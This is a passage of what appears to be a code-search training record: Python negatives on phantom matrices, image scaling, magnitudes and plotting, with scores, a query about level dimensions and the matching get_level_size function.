phantom_type == 'shepp_logan':\n # [semiaxis 1, semiaxis 2, x center, y center, phi=angle (degrees), greyscale=attenuation]\n M = np.array([[ .69, .92, 0, 0, 0, 1.],\n [ .6624, .8740, 0, -.0184, 0, -0.8],\n [ .1100, .3100, .22, 0, -18, -.2],\n [ .1600, .4100, -.22, 0, 18, -.2],\n [ .2100, .2500, 0, .35, 0, .1],\n [ .0460, .0460, 0, .1, 0, .1],\n [ .0460, .0460, 0, -.1, 0, .1],\n [ .0460, .0230, -.08, -.605, 0, .1],\n [ .0230, .0230, 0, -.605, 0, .1],\n [ .0230, .0460, .06, -.605, 0, .1]])\n\n\n elif phantom_type == 'modified_shepp_logan':\n # [semiaxis 1, semiaxis 2, x center, y center, 
phi=angle (degrees), greyscale=attenuation]\n p1 = [.7, .8, 0, 0, 0, 1]\n p2 = [.65,.75,0,0,0,-.9]\n p3 = [.15,.2,0,.4,0,.5]\n p4 = [.25,.15,-.25,.25,135.79,.2]\n p5 = [.25,.15,.25,.25,45.26,.2]\n p6 = [.08,.25,0,-.3,28.65,.65]\n p7 = [.05,.05,.5,-.3,0,.8]\n # combine into a matrix with one ellipse in each row\n M = np.array([p1, p2, p3, p4, p5, p6, p7]);\n \n\n\n elif phantom_type == 'squares':\n # [x center, y center, edge length ,phi=angle (degrees), greyscale=attenuation]\n s1 = [0,0,1.3,0,1]\n s2 = [0,0,1.1,0,-.9]\n s3 = [.1,-.1,.5,180/6,.4]\n s4 = [-.25,.15,.25,180/4,.2]\n s5 = [-.2,.25,.3,180/3,.4]\n #combine into a matrix with one square in each row\n M = np.array([s1, s2, s3, s4, s5]);\n\n elif (phantom_type == 'rectangles'):\n # [x center, y center, dimension 1, dimension 2, phi=angle (degrees), greyscale=attenuation]\n r1 = [0,0,1.3,1.1,0,1]\n r2 = [0,0,1.2,1,0,-.9]\n r3 = [0.25,.15,.25,.6,180/6,.4]\n r4 = [-.2,.1,.25,.20,180/4,.2]\n r5 = [-.3,.2,.3,.2,180/6,.4]\n #combine into a matrix with one square in each row\n M = np.array([r1, r2, r3, r4, r5])\n else:\n print('Unknown phantom_type')\n M = None\n\n return M", "def _get_normal_map_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Normals/0.125/\"\n else:\n return \"Normals/0.25/\"\n else: \n return \"Normals/\"", "def resolution(self, level):\n return 2 ** (level - 1)", "def resolution(self):\n return Prism.resolution(self,self.beam,self.wavelength)", "def normalize_zoomlvl(lvl):\n if lvl < gMinZoomLevel:\n return gMinZoomLevel\n elif lvl > gMaxZoomLevel:\n return gMaxZoomLevel\n else:\n return lvl - gMinZoomLevel", "def _get_image_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Rectified_rescaled/0.125/\"\n else:\n return \"Rectified_rescaled/0.25/\"\n else:\n return \"Rectified/\"", "def LoadMMMetaData(filename):\r\n## print \"loading MM Metadata\"\r\n file = open(filename,'r')\r\n data = file.read()\r\n file.close()\r\n data = data.replace(\"false\",\"False\")\r\n data = data.replace(\"true\",\"True\")\r\n data = data.replace(\"null\",\"0\")\r\n f = eval(str(data))\r\n tiles = []\r\n for i in f.keys():\r\n if i != \"Summary\":\r\n tiles.append(i)\r\n xpos = f[tiles[0]][\"XPositionUm\"]\r\n ypos = f[tiles[0]][\"YPositionUm\"]\r\n zpos = f[tiles[0]][\"ZPositionUm\"] \r\n ScaleFactorX= f[\"Summary\"][\"PixelSize_um\"]\r\n ScaleFactorY= ScaleFactorX\r\n Width=f[\"Summary\"][\"Width\"]\r\n Height=f[\"Summary\"][\"Height\"]\r\n extent=[xpos-(Width/2)*ScaleFactorX,xpos+(Width/2)*ScaleFactorX,\\\r\n ypos-(Height/2)*ScaleFactorY,ypos+(Height/2)*ScaleFactorY] #FOR NOW\r\n\r\n #WHY WAS IT + THEN - FOR Y??\r\n return extent,zpos", "def getMeasure(unique_name):", "def getMeasure(unique_name):", "def take_mag(x, dim=1):\n power = torch.stack(torch.chunk(x, 2, dim=dim), dim=-1).pow(2).sum(dim=-1)\n power = power + EPS\n return power.pow(0.5)", "def extractScale(self,groups):\n self.scaleX = float(groups[0])\n self.scaleY = float(groups[0])\n if len(groups) == 2 and groups[1]:\n self.scaleY = float(groups[1])\n self.matrix = [[self.scaleX, 0.0, 0.0], \\\n [0.0, self.scaleY, 0.0]]", "def zoom_augmentation():\n # Get the width and the height of the zoomed version\n x_len, y_len = np.random.randint(250, 350, size=2)\n # Get left upper ,right and lower bound of the pixels in the original image\n left = np.random.randint(x_size-x_len)\n upper = np.random.randint(y_size-y_len)\n right, lower = left + x_len, upper+y_len\n # Crops the box and resizes it to the 
original image size\n box = (left, upper, right, lower)\n return lambda image: image.transform(image.size, Image.EXTENT, box)", "def getM(self):\r\n return self.M", "def getMosaic(self):\n from .gsMosaic import Mosaic\n mfn = Mosaic(self.mosaicFilename, \"r\")\n\n return mfn", "def lphot(self):\n return self._get_mean_and_samples_attribute('lphot')", "def limmags(self):\n return self.__lim_mags", "def ratio_4_doc(shot, dir, num_probes = 16):\n # data = [[0] *3 for i in range(num_probes)]\n # magdata = hdr.getMagData(shot)\n probe_locs = get_probeLocs_calib_setup(shot)\n data=hdr.getquikData(shot)\n time,eastcurrent,westcurrent = loadcurrent(shot)#using eastcurrent\n ratios = [[0]*3 for i in range(num_probes)]\n for probe in range(num_probes):\n ratio =1\n inverted = False\n # fig, (ax1, ax2, ax3) = plt.subplots(3, 1, sharex=True)\n B=sp.signal.detrend(cumtrapz(data.unCalibData[dir,probe,:], data.time))\n plot_time = data.time[:-1]\n if(np.max(B[2000:6000]) < abs(np.average(B[2000:6000]))):\n # print(\"\\ninverted!\")\n inverted = True\n # B = B* -1\n # ratio = -1\n\n r = probe_locs[probe]\n max_current = polyPeak_noPlot(time,eastcurrent)\n # if(np.max(eastcurrent) < -1*(np.min(eastcurrent))):\n # max_current = -1*np.min(eastcurrent)\n helmB = helmholtz2(r,max_current)\n\n # THis is intentional! I am only using shots where the cmponent is lined\n # up with the z-direction of the helmholz field\n # helmB[2] = helmB[2]*-1\n max_theoretical = np.max(helmB[2])\n max_measured = polyPeak_noPlot(plot_time, B)\n\n\n ratio = ratio * max_theoretical/max_measured\n if ratio > 30000 or ratio < -30000:\n ratio = 0\n\n\n ratios[probe][dir] = ratio\n # print(\"\\tRatio is: %f\" %(ratio))\n # if(inverted and ratio <0):\n # print(\"Inverted and ratio reflects that\")\n # elif(not inverted and ratio <0):\n if probe ==1:\n print(\"\\n Ratio: %5f \\n\\t max_measured: %3f, \\n\\t max_theoretical: %5f\"%(ratio,max_measured,max_theoretical ) )\n\n # Compute the median of the non-zero elements\n # m = np.median(foo[foo > 0])\n # Assign the median to the zero elements\n # foo[foo == 0] = m\n return ratios", "def mag(field):\n return np.sqrt(np.sum(field**2, axis=0, keepdims=True))", "def calc_mag(self):\n mag = np.sum(self.box)\n return mag", "def get_scale():\r\n\r\n \r\n return 0.5", "def getDimensions():", "def displacement_mag(self):\n print(3284 * math.pow(self.concentration, -0.158))\n\n return 3284 * math.pow(self.concentration, -0.158)", "def gen_img_settings_quality(l):\n \n lhalf = 0.5*l\n \n ### sphere radius\n \n sphere_radius = 0.7\n #sphere_rgbcolor = [0.25,0.65,0.65]\n \n ### RESOLUTION\n \n img_widthpx = 1024\n img_heightpx = 1024\n\n ### includes and defaults\n\n povray_includes = [\"colors.inc\", \"textures.inc\", \"shapes.inc\"]\n povray_defaults = [vapory.Finish( 'ambient', 0.1,\n\t \t\t\t 'diffuse', 0.65,\n\t\t \t\t 'specular', 0.5,\n\t\t\t \t 'shininess', 0.53,\n\t\t\t\t 'opacity', 1.0)]\n\n\n ### light sources\n\n sun1 = vapory.LightSource([lhalf, lhalf, -1.01*lhalf], 'color', 'White')\n sun2 = vapory.LightSource([lhalf, lhalf, -1.01*lhalf], 'color', [0.7, 0.7, 0.7])\n\n ### background\n\n background = vapory.Background('color', [1,1,1])\n\n ### camera\n\n #povray_cam = vapory.Camera('angle', 75, 'location', [-15 , 15.0+0.5,15.0-0.25],'look_at', [0.25 , 15.0+0.5, 15.0-0.25])\n povray_cam = vapory.Camera('location', [lhalf, lhalf, -1.01*lhalf], 'look_at', [lhalf,lhalf,0], 'angle', 90)\n\n ### text\n # If desired include this in the povray_objects - array declared in the loop\n #text1 = 
vapory.Text( 'ttf', '\"timrom.ttf\"' ,'\"Division:\"', 0.01, 0.0, 'scale', [0.5,0.5,0.5],'rotate', [0,90,0], 'translate' , [0.0 , 15.0+2.75-1 , 15.0+1.5], vapory.Pigment('Black') ) \n\n ### render quality\n\n quality = 10\n \n return sphere_radius, img_widthpx, img_heightpx, povray_includes, povray_defaults, sun1, sun2, background, povray_cam, quality", "def flux_hack(self):\r\n return self.planes[1].galaxies[0].light_profiles[0].flux", "def magnification(w0, lambda0, s, f, M2=1):\n zR2 = z_rayleigh(w0, lambda0, M2)**2\n return f/np.sqrt((s+f)**2+zR2)", "def getimgs():", "def zoom(self):\n return self.container['zoom']", "def M(self):\n return self._properties['M']", "def magnitude(frame):\n sobelx = lambda im: cv2.Sobel(im, cv2.CV_64F, 1, 0, ksize=3)\n sobely = lambda im: cv2.Sobel(im, cv2.CV_64F, 0, 1, ksize=3)\n dxabs = cv2.convertScaleAbs(sobelx(frame))\n dyabs = cv2.convertScaleAbs(sobely(frame))\n\n return cv2.addWeighted(dxabs, 0.5, dyabs, 0.5, 0)", "def get_disp_lims():\n\n return [[0., 10.], [0., 20.], [0., 1./3.]]", "def mag2(self) -> numbers.Number:\n mv_val = self.layout.gmt_func(self.layout.adjoint_func(self.value), self.value)\n return mv_val[0]", "def zoom(self):\n return self['zoom']", "def rscale(mag=10.0):\n if mag > 11.5:\n return 0.5\n elif mag > 11.0:\n return 1.0\n elif mag > 10.5:\n return 1.5\n elif mag > 10.0:\n return 1.5\n elif mag > 9.5:\n return 2.0\n elif mag > 9.0:\n return 2.5\n elif mag > 8.5:\n return 3.0\n else:\n return 3.5", "def getMeasures():", "def _get_synthesis_size(self, lvl):\n lvl_img = self.target_pyramid[lvl]\n h, w = lvl_img.shape[-2:]\n h, w = int(h * self.scale_factor[0]), int(w * self.scale_factor[1])\n return h, w", "def get_mlt_phys(sed_name):\n\n new_name = sed_name.replace('+','-').replace('a','-').split('-')\n\n logg_sgn_dex = len(new_name[0])\n\n if sed_name[logg_sgn_dex] == '-':\n logg_sgn = 1.0\n elif sed_name[logg_sgn_dex] == '+':\n logg_sgn = -1.0\n else:\n raise RuntimeError('Cannot get logg_sgn for %s' % sed_name)\n\n metallicity_sgn_dex = len(new_name[0]) + len(new_name[1]) + 1\n\n if sed_name[metallicity_sgn_dex] == '-':\n metallicity_sgn = -1.0\n elif sed_name[metallicity_sgn_dex] == '+':\n metallicity_sgn = 1.0\n else:\n raise RuntimeError('Cannot get metallicity_sgn for %s' % sed_name)\n\n teff = 100.0*float(new_name[0][3:])\n metallicity = metallicity_sgn*float(new_name[2])\n logg = logg_sgn*float(new_name[1])\n\n return teff, metallicity, logg", "def getLevels():", "def measurements(m_list):\n def area(a_list):\n return float(a_list[0]) * float(a_list[len(a_list) - 1])\n\n def perimeter(a_list):\n return (float(a_list[0]) + float(a_list[len(a_list) - 1])) * 2\n\n description = 'Perimeter = ' + str(perimeter(m_list)) + ' Area = ' + str(area(m_list))\n return description", "def GetScaleBlocks(width):\n\n rord=numpy.log10(abs(width)/2.0)\n nrord=rord % 1\n\n if nrord < numpy.log10(2):\n spc=0.2*pow(10,numpy.floor(rord))\n smallspc=spc\n bigspc=5*spc\n newspc=[0,smallspc,smallspc*2,smallspc*3,smallspc*4,smallspc*5]\n elif nrord < numpy.log10(5):\n spc=0.5*pow(10,numpy.floor(rord))\n smallspc=spc\n bigspc=5*spc\n newspc=[0,smallspc,smallspc*2,smallspc*3,smallspc*4]\n else:\n spc=pow(10,numpy.floor(rord))\n smallspc=spc\n bigspc=spc*5\n newspc=[0,smallspc,smallspc*2,smallspc*3,smallspc*4,smallspc*5]\n\n if len(newspc) == 5:\n #labels=['0',None,\"%g\" % smallspc*2,None,\"%g\" % (smallspc*4)]\n labels=['0',None,None,None,\"%g\" % (smallspc*4)]\n else:\n labels=['0',None,None,None,None,\"%g\" % (smallspc*5)]\n\n 
temp_max=newspc[len(newspc)-1]\n start=temp_max\n for temp in numpy.arange(start,width-bigspc/2,bigspc):\n temp_max=temp_max+bigspc\n newspc.append(temp_max)\n labels.append(\"%g\" % temp_max)\n\n #start=temp_max\n #for temp in Numeric.arange(start,width-smallspc/2,smallspc):\n # labels.append(None)\n # temp_max=temp_max+smallspc \n # newspc.append(temp_max) \n\n return (numpy.array(newspc,numpy.float32),labels)", "def iterate_pyramid_levels(image: MultiscaleSpatialImage) -> Generator[DataArray, None, None]:\n for k in range(len(image)):\n scale_name = f\"scale{k}\"\n dt = image[scale_name]\n v = dt.values()\n assert len(v) == 1\n xdata = next(iter(v))\n yield xdata", "def _get_magnitudes(self):\n\n self.logging.debug('Get magnitudes ' )\n\n self.mags = {}\n\n steps = ['dbopen netmag', 'dbsubset orid != NULL']\n\n fields = ['orid', 'magid', 'magnitude', 'magtype',\n 'auth', 'uncertainty', 'lddate']\n\n for v in extract_from_db(self.db, steps, fields):\n orid = v.pop('orid')\n self.logging.debug('new mag for orid:%s' % orid)\n\n try:\n v['strmag'] = '%0.1f %s' % ( float(v['magnitude']), v['magtype'] )\n except:\n v['strmag'] = '-'\n\n if not orid in self.mags:\n self.mags[ orid ] = {}\n\n self.mags[ orid ][ v['magid'] ] = v", "def build_mipmaps(self, base: int = 0, max_level: int = 1000) -> None:\n if self._samples > 0:\n raise ValueError(\"Multisampled textures don't support mimpmaps\")\n\n gl.glActiveTexture(gl.GL_TEXTURE0 + self._ctx.default_texture_unit)\n gl.glBindTexture(gl.GL_TEXTURE_2D, self._glo)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_BASE_LEVEL, base)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAX_LEVEL, max_level)\n gl.glGenerateMipmap(gl.GL_TEXTURE_2D)", "def get_specs(mag : str, spec : str) -> list:\n if spec == \"F\":\n #if mag == \"20x\": max = 6\n #if mag == \"40x\": max = 8\n #if mag == \"60x\": max = 12\n max = 12\n specs = [\"F\"+str(i).zfill(3) for i in range(1,13)]\n if spec == \"Z\":\n specs = [\"Z\"+str(i).zfill(2) for i in range(1,8)]\n if spec == \"A\":\n specs = [\"A\"+str(i).zfill(2) for i in range(1,5)]\n return specs", "def display_multispectral_image(data, mask, sl, scale = 300):\n fig, axes = plt.subplots(2,2, figsize=(10,10))\n ax = axes.ravel()\n for k, ch in enumerate(chn_names):\n ax[k].imshow(data[:, :, sl, k].T + 300*mask[:,:,sl].T, cmap='gray', origin='lower')\n ax[k].set_title(ch)\n ax[k].set(xlabel=\"\")\n ax[k].axis('off')\n plt.suptitle('The multispectral MRI slice %d with the ROI mask' % sl) \n plt.tight_layout\n plt.show()", "def zoom(self):\n res = np.max(self.metadata[\"resolution\"])\n\n if self.atlas_name == \"allen_human_500um\":\n logger.debug(\n \"ATLAS: setting zoom manually for human atlas, atlas needs fixing\"\n )\n return 350\n else:\n return 40 / res", "def mab0(self):\n return GALEX_INFO[self.bandname][\"ABmag0\"]", "def showscale(self):\n return self[\"showscale\"]", "def aspectRatios(self):\n return np.array([f.aspectRatio() for f in self])", "def test_mixing_ratio_dimensions():\n p = 998. 
* units.mbar\n e = 73.75 * units.hPa\n assert str(mixing_ratio(e, p).units) == 'dimensionless'", "def map_sim_property(**kwargs):\n\n GR = glo.global_results()\n\n p = copy.copy(params)\n for key,val in kwargs.items():\n setattr(p,key,val)\n\n counter = 0\n fignum = 1\n if p.gal_index == 'all':\n\n for gal_index in GR.N_gal - np.arange(GR.N_gal) - 1:\n\n if counter == 0:\n fig, axes = plt.subplots(3, 3, figsize=(20,15))\n axs = [axes[0,0],axes[0,1],axes[0,2],axes[1,0],axes[1,1],axes[1,2],axes[2,0],axes[2,1],axes[2,2]]\n counter = 9\n\n gal_ob = gal.galaxy(GR=GR, gal_index=gal_index)\n simgas = aux.load_temp_file(gal_ob=gal_ob,data_type='simgas')\n map2D,lab,max_scale = make_projection_map(simgas,prop=p.prop)\n if p.prop == 'm': map2D = map2D * simgas.m.sum()/np.sum(map2D) \n\n # Plot\n Rmax = max_scale/2\n ax1 = axs[9 - counter]\n if p.log:\n map2D[map2D < 10.**p.vmin] = 10.**p.vmin/2\n map2D[map2D > 10.**p.vmax] = 10.**p.vmax\n map2D = np.log10(map2D)\n if not p.log:\n map2D[map2D < p.vmin] = p.vmin/2\n map2D[map2D > p.vmax] = p.vmax\n im = ax1.imshow(map2D,\\\n extent=[-Rmax,Rmax,-Rmax,Rmax],vmin=p.vmin,cmap=p.cmap)\n fig.colorbar(im,shrink=0.8,ax=ax1,label=lab)\n if not p.add: ax1.set_xlabel('x [kpc]'); ax1.set_ylabel('y [kpc]')\n # Limit axes limits a bit to avoid area with no particles...\n ax1.set_xlim([-0.99*Rmax,0.99*Rmax])\n ax1.set_ylim([-0.99*Rmax,0.99*Rmax])\n if (p.prop == 'm') & (p.text == True):\n ax1.text(0.05,0.85,'M$_{gas}$=%.2eM$_{\\odot}$' % np.sum(simgas.m),\\\n fontsize=14,transform=ax1.transAxes,color='white')\n ax1.text(0.05,0.75,'SFR=%.2eM$_{\\odot}$/yr' % GR.SFR[gal_index],\\\n fontsize=14,transform=ax1.transAxes,color='white')\n\n counter -= 1\n\n #if counter == 0:\n # ax1 = plt.subplots(1, 1)\n #cbar = fig.colorbar(im, ax=axes.ravel().tolist(), shrink=0.95, label=lab)\n # fig.colorbar(im,shrink=0.8,label=lab)\n\n if counter == 0 or gal_index == GR.N_gal-1:\n print('Saving in ' + p.d_plot + 'sim_data/map_%s_%s_gals_%i.%s' % (p.prop,p.z1,fignum,p.format))\n # plt.tight_layout()\n if not os.path.isdir(p.d_plot + 'sim_data/'): os.mkdir(p.d_plot + 'sim_data/')\n plt.savefig(p.d_plot + 'sim_data/map_%s_%s_gals_%i.%s' % (p.prop,p.z1,fignum,p.format), format=p.format, dpi=250, facecolor='w')\n fignum += 1\n\n else:\n if p.add:\n fig, ax1 = plt.gcf(), p.ax\n if not p.add:\n fig = plt.figure(figsize=(8,6))\n ax1 = fig.add_axes([0.1, 0.01, 0.8, 0.8]) \n ax1.axis('equal')\n\n gal_ob = gal.galaxy(GR=GR, gal_index=p.gal_index)\n simgas = aux.load_temp_file(gal_ob=gal_ob,data_type=p.sim_type)\n if p.R_max:\n # Cut out square\n simgas = simgas[(np.abs(simgas.x) < p.R_max) & (np.abs(simgas.y) < p.R_max)]\n # Add bottom left corner\n extra_row = simgas.iloc[0] # to ensure that map gets the right size\n extra_row['x'],extra_row['y'] = -p.R_max,-p.R_max\n extra_row[p.prop] = 0\n simgas = simgas.append(extra_row).reset_index(drop=True) \n # Add top right corner\n extra_row = simgas.iloc[0] # to ensure that map gets the right size\n extra_row['x'],extra_row['y'] = p.R_max,p.R_max\n extra_row[p.prop] = 0\n simgas = simgas.append(extra_row).reset_index(drop=True) \n else:\n pass\n map2D,lab,max_scale = make_projection_map(simgas,prop=p.prop)\n if p.prop == 'm': map2D = map2D * simgas.m.sum()/np.sum(map2D) \n print('Min and max of map: ',map2D.min(),map2D.max())\n #map2D[map2D < 1e4] = 1e6\n # Plot map\n if not p.R_max:\n p.R_max = max_scale/2\n if p.log: \n if not p.vmax: p.vmax = np.log10(map2D).max()\n if not p.vmin: p.vmin = np.log10(map2D).max() - 4\n map2D[map2D < 10.**p.vmin] = 
10.**p.vmin/2\n map2D[map2D > 10.**p.vmax] = 10.**p.vmax\n map2D = np.log10(map2D)\n else:\n if not p.vmax: p.vmax = np.max(map2D)\n if not p.vmin: p.vmin = np.min(map2D) / 1e3\n map2D[map2D < p.vmin] = p.vmin #np.min(map2D[map2D > 0])\n map2D = np.flipud(map2D)\n\n im = ax1.imshow(map2D,\\\n extent=[-max_scale/2,max_scale/2,-max_scale/2,max_scale/2],vmin=p.vmin,vmax=p.vmax,cmap=p.cmap)\n # Limit axes limits a bit to avoid area with no particles...\n zoom = 1#/1.5\n ax1.set_xlim([-1/zoom * p.R_max,1/zoom * p.R_max])\n ax1.set_ylim([-1/zoom * p.R_max,1/zoom * p.R_max])\n if p.colorbar: \n divider = make_axes_locatable(ax1)\n cax1 = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n fig.colorbar(im,cax=cax1,label=lab)\n if not p.add: ax1.set_xlabel('x [kpc]'); ax1.set_ylabel('y [kpc]')\n if (p.prop == 'm') & (p.text == True):\n simstar = aux.load_temp_file(gal_ob=gal_ob,data_type='simstar')\n ax1.text(0.05,0.92,'M$_{star}$=%.1e M$_{\\odot}$' % np.sum(simstar.m),\\\n fontsize=14,transform=ax1.transAxes,color='white')\n ax1.text(0.05,0.86,'M$_{gas}$=%.1e M$_{\\odot}$' % np.sum(simgas.m),\\\n fontsize=14,transform=ax1.transAxes,color='white')\n ax1.text(0.05,0.80,'SFR=%.2f M$_{\\odot}$/yr' % GR.SFR[p.gal_index],\\\n fontsize=14,transform=ax1.transAxes,color='white')\n if p.savefig:\n if not os.path.isdir(p.d_plot + 'sim_data/'): os.mkdir(p.d_plot + 'sim_data/') \n plt.savefig(p.d_plot + 'sim_data/map_%s_G%i.png' % (p.prop,p.gal_index), format=p.format, dpi=250, facecolor='w')\n\n if not p.colorbar: return(im)", "def estimate_phones(x):\n if x['mean_luminosity_km2'] > 5:\n return 10\n elif x['mean_luminosity_km2'] > 1:\n return 5\n else:\n return 1", "def level1Representation(self):\n rep = Level.load_rep('level/level1.txt')\n objects = {\n 'lever': {'l', 'm'},\n 'door': {'p', 'q'},\n 'player': {'j'},\n 'enemy': {'e'},\n 'object': {'a'},\n 'robot': {'r'}\n }\n toggle_objects = {\n 'l': {'p'},\n 'm': {'q'}\n }\n tile_map = {\n 'x': pygame.image.load('img/wall.png'),\n ',': pygame.image.load('img/dark_gray_tile.png'),\n '.': pygame.image.load('img/light_gray_tile.png'),\n '-': pygame.image.load('img/dark_red_tile.png')\n }\n level = Level(\n rep,\n objects,\n toggle_objects,\n self.width,\n self.height,\n Dimensions.width,\n Dimensions.height\n )\n class_map = {\n 'lever': Lever,\n 'robot': Robot,\n 'enemy': Enemy,\n 'player': MainCharacter,\n 'door': Door,\n 'object': Treasure\n }\n values = {\n 'l': {'image': 'img/lever_a_0.png', 'screen': self.screen},\n 'm': {'image': 'img/lever_b_0.png', 'screen': self.screen},\n 'p': {'toggled': False},\n 'q': {'toggled': False},\n 'j': {},\n 'e': {},\n 'a': {},\n 'r': {}\n }\n\n coords = level.coordinates(['x'])\n unwalkable = {x for k in coords for x in coords[k]}\n\n level1Dict = {\n 'levelIndex': 1,\n 'rep': rep,\n 'objects': objects,\n 'toggle_objects': toggle_objects,\n 'tile_map': tile_map,\n 'level': level,\n 'class_map': class_map,\n 'values': values,\n 'coords': coords,\n 'unwalkable': unwalkable,\n 'config_ai' : self.level1AI\n }\n return level1Dict" ]
[ "0.7798809", "0.6923862", "0.66853", "0.65677786", "0.62147903", "0.6124908", "0.61031574", "0.6090716", "0.6088541", "0.58556306", "0.5820038", "0.56304854", "0.5626129", "0.56065404", "0.5559378", "0.54275894", "0.54266506", "0.5425498", "0.53985816", "0.53818405", "0.5253527", "0.5240948", "0.51987", "0.5192708", "0.51578003", "0.5132643", "0.5086026", "0.50854266", "0.50435466", "0.49884495", "0.49748033", "0.49724284", "0.49649274", "0.49234444", "0.49214375", "0.4913182", "0.48756644", "0.48746878", "0.4873955", "0.48696244", "0.48639742", "0.48207143", "0.48145312", "0.48098424", "0.48051", "0.47956938", "0.47950175", "0.4786803", "0.47814497", "0.47762296", "0.47553313", "0.4736325", "0.47307462", "0.47229123", "0.47222373", "0.47176754", "0.47176754", "0.47077367", "0.4687485", "0.46854198", "0.46821135", "0.46702373", "0.4668277", "0.4662483", "0.46614853", "0.46583644", "0.4652125", "0.4649919", "0.4648449", "0.46462983", "0.4635233", "0.4633659", "0.46312585", "0.46309984", "0.46293157", "0.46224788", "0.46219036", "0.4620888", "0.46195853", "0.46154198", "0.46124825", "0.46076936", "0.46060538", "0.46059576", "0.46040177", "0.46032664", "0.45972878", "0.45959753", "0.45950916", "0.45939964", "0.45928487", "0.45913425", "0.45872703", "0.4585672", "0.4580005", "0.4579921", "0.45737037", "0.45713294", "0.4566695", "0.45614827" ]
0.78430814
0
Returns the dimensions of a level
def get_level_size(slide, level): return slide.level_dimensions[level]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dimensions():", "def getDimensions():", "def _get_ndim(self):\n return len(self.level_shapes[0])", "def depth(self):\n return _libsbml.Dimensions_depth(self)", "def dimensions(self) -> int:\n return pulumi.get(self, \"dimensions\")", "def get_map_size(level):\n if level < 5:\n return 5, 5\n if level < 70:\n return 10, 10\n if level < 150:\n return 25, 25\n return 50, 50", "def get_dim(self, name):\n return len(self.root_group.dimensions[name])", "def get_dimension_length(self):\n pass", "def dimension(self):", "def dimensions(self, varname):\n if self.handle == None: return None\n try:\n var = self.handle.variables[varname]\n except KeyError:\n return None\n return var.dimensions", "def dimension(self):\n\t\treturn self.d", "def dims(self):\n return self[0].dims", "def getDepth(self):\n return _libsbml.Dimensions_getDepth(self)", "def dims(self):\n return self.v.dims() # TODO: check (empty? etc)\n #return self.t.shape # TODO: check (empty? etc)\n # TODO: convert to tuple? here / in varset?", "def levshape(self) -> Shape:\n return tuple(len(x) for x in self.levels)", "def size(self, level=None):\n level = level or self.local_variables\n names = {}\n while level:\n for name in level.bindings:\n names[name] = 1\n level = level.parent\n return len(names)", "def getDimensions(unique_name=None):", "def dimensions(self):\n return self.index.names", "def N(self):\n return self._dimensions", "def dimension(self) -> float:\n return self._dimensions", "def getDimensions(self):\n\t\tprint \"Returning\",self.x,self.y,self.slicesPerTimepoint\n\t\treturn (self.x, self.y, self.slicesPerTimepoint)", "def get_dimensions(self):\r\n x = []\r\n y = []\r\n z = []\r\n for i in self.verts:\r\n x.append(i[0])\r\n y.append(i[1])\r\n z.append(i[2])\r\n\r\n x.append(abs(min(x)))\r\n y.append(abs(min(y)))\r\n z.append(abs(min(z)))\r\n\r\n return max(x), max(y), max(z)", "def n_levels(self):\n return len(self.scales)", "def getLevels():", "def get_dim():\n return (Settings.width, Settings.height)", "def dims(self):\n return tuple(d for d in (v.states for v in self.__vars)) if len(self.__vars) else (1,)", "def get_dimension(self):\n return", "def dim(self):\n\t\treturn self.D", "def getDimensions(self):\n\ttop = self.getTop()\n\tleft = self.getLeft()\n\twidth = self.getWidth()\n\theight = self.getHeight()\n\treturn top, left, width, height", "def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"dimensions\")", "def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"dimensions\")", "def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"dimensions\")", "def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"dimensions\")", "def dimensions(self) -> Optional[Sequence['outputs.MetricDimensionResponse']]:\n return pulumi.get(self, \"dimensions\")", "def dimensions(self) -> Optional[Sequence['outputs.MetricDimensionResponse']]:\n return pulumi.get(self, \"dimensions\")", "def get_dimensions(n=1):\n if n <= len(self._dimensions): return self._dimensions[n-1]", "def getDimensionality(self):\n return self.dimensionality", "def getDimensions(self):\n return _libsbml.Layout_getDimensions(self)", "def get_dim(self):\n return self.dim", "def level_size(level):\n return level.count('\\n') + 1, level.find('\\n')", "def dims(self) -> tuple[str, str]:\n # if self.dim0 is not None:\n return self.y_dim, self.x_dim", "def dim(self):\n return self._d", "def 
get_dimensionality(self) -> int:\n return self.dimensionality", "def getNumDimensions(self):\n return len(self.di.keys())", "def dimensions(self):\n d=dict()\n d['div'] = (self._div)\n d['var'] = len(self.used_variables)\n d['x'] = self.Xdim\n d['y'] = self.Ydim\n d['lev'] = self.lev\n d['dir'] = self._nb_dir\n return(d)", "def num_dims(self):\n return self.h5['{}/{}'.format(SETTINGS, N_DIMS_STR)][()]", "def getDimensions(self):\n return self._majax, self._minax, self._pa", "def dim_calculator():\r\n probe_set = np.arange(1, 101)\r\n X = -36 + ((probe_set - 1) // 10) * 4\r\n Y = 2 - ((probe_set - 1) % 10) * 4\r\n dim = np.vstack((X, Y)).T\r\n return dim", "def level_width(cls, level):\n if not 0 <= level <= cls.max_level:\n raise ValueError(\"level must be between 0 and {}\".format(cls.max_level))\n return 2 ** (cls.max_level - level)", "def getDimensionality(self):\n dimensionality = self._distribution.returnDimensionality()\n return dimensionality", "def test_level_width_1(self):\n root = Node(0)\n root.add(1)\n root.add(2)\n root.add(3)\n root.children[0].add(4)\n root.children[2].add(5)\n self.assertEqual(level_width(root), [1, 3, 2])", "def dimension(self):\n return 3*self.genus - 3 + self.n", "def get_dimension_width(self):\n pass", "def dimension(self):\n return self._dim", "def get_dim(self):\n return self._dim", "def test_get_dimension(self):\n\n v = Vector({ 'x': 1 })\n self.assertEqual(1, v.dimensions['x'])", "def dimensions( cls, value, typeCode=None ):\n return value.shape", "def getLevel(self, *args):\n return _libsbml.LayoutExtension_getLevel(self, *args)", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def get_dimensions(self, fieldname=None):\n if fieldname is None:\n dims = self._dims.keys()\n else:\n dims = self.read_field(fieldname).dimensions.keys()\n return tuple(dims)", "def dimension_count(self):\n return self._dimensionCount", "def _get_level_width(air_pressure_bounds, ref_lev, 